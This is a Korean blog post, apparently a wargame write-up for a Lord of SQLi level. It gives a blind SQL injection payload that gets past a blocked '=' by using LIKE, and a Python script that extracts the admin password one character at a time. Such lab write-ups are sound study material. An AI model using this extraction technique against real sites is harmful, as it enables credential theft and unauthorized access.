이 문제는 pw 가 실제 pw와 같아야한다.
이 역시 블라인드 인젝션으로 풀었다.
?pw=1234%27%7C%7Cid%20like%20%27admin%27%20%26%26%20length(pw)%20like%208%23
아마 이 문제 자바 수업때 안듣고 풀었던것 같은데 언제 풀었는지 기억이 안난다.
스크립트가 에버노트에 있는거보면 수업시간때 푼것 같다.
import requests
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}
'''
?pw=1234%27||id%20like%20%27admin%27%20%26%26%20right(left(pw,1),1)%20like%2013%23
'''
for x in range(8):
for i in range(33, 125):
rs = requests.get(url + "?pw=1234%27||id%20like%20%27admin%27%20%26%26%20right(left(pw," + str(x+1) + "),1)%20like%20'" + chr(i) + "' %23", headers=headers, cookies=cookies)
text = rs.text
if(“<br><h2>Hello admin</h2>" in text):
print(str(x+1) + " " + chr(i) + " find it")
이 문제는 = 이 막혀있다.
in 이나 like로 이용하여 우회하면 된다.
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
[LOS1] bugbear (0) | 2018.09.22 |
---|---|
[LOS1] darkknight (0) | 2018.09.22 |
[LOS1] skelleton (0) | 2018.09.22 |
[LOS1] vampire (0) | 2018.09.22 |
[LOS1] troll (0) | 2018.09.22 |